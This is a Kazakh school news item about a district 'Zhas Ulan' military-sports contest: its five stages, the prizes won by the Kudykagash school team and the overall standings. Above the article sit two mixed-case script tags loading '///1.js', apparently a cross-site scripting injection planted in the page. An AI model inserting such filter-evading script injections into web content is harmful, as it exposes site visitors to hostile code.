<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.05.2017

Мамыр айының 11 күні Р.Елебаев атындағы Құдықағаш орта мектебінде «Жас ұлан» әскери-спорттық сайысы өтті. Сайысқа аудан бойынша 13 мектеп қатысты. Сайыс 5 кезеңнен тұрды:

1.Саптық дайындық.

2.Калашников автоматын толық емес және бөлшектеп жинау, оқжаттарды жабдықтау.

3.Жалпы-әскери қорғаныш костюмін кию.

4.Жалпы физикалық дайындық.

5.Әскери-спорттық эстафета.

Құдықағаш орта мектебінің командасы келесі кезеңдер бойынша жүлделі орындар алды:

1.Саптық дайындық және ән І орын;

2.Калашников автоматын толық емес және бөлшектеп жинау, оқжаттарды жабдықтау І орын;

3.Жалпы-әскери қорғаныш костюмін кию ІІ орын;

4.Жалпы физикалық дайындық І орын;

5.Әскери-спорттық эстафета І орын;

6.Қыздар арасында Базарова Индирова «Жалпы физикалық дайындық» бойынша ІІІ орын.

Жалпы командалық сайыс бойынша:

І орын – Құдықағаш орта мектебі;

ІІ орын – Сауле орта мектебі;

ІІІ орын – Абай атындағы №2 ОМ.

Жеңімпаздарды құттықтаймыз және облыстық сайыста сәттілік тілейміз!

Просмотров: 643


Пікір қосу



Деректерді қолтаңбаға қосу
Текст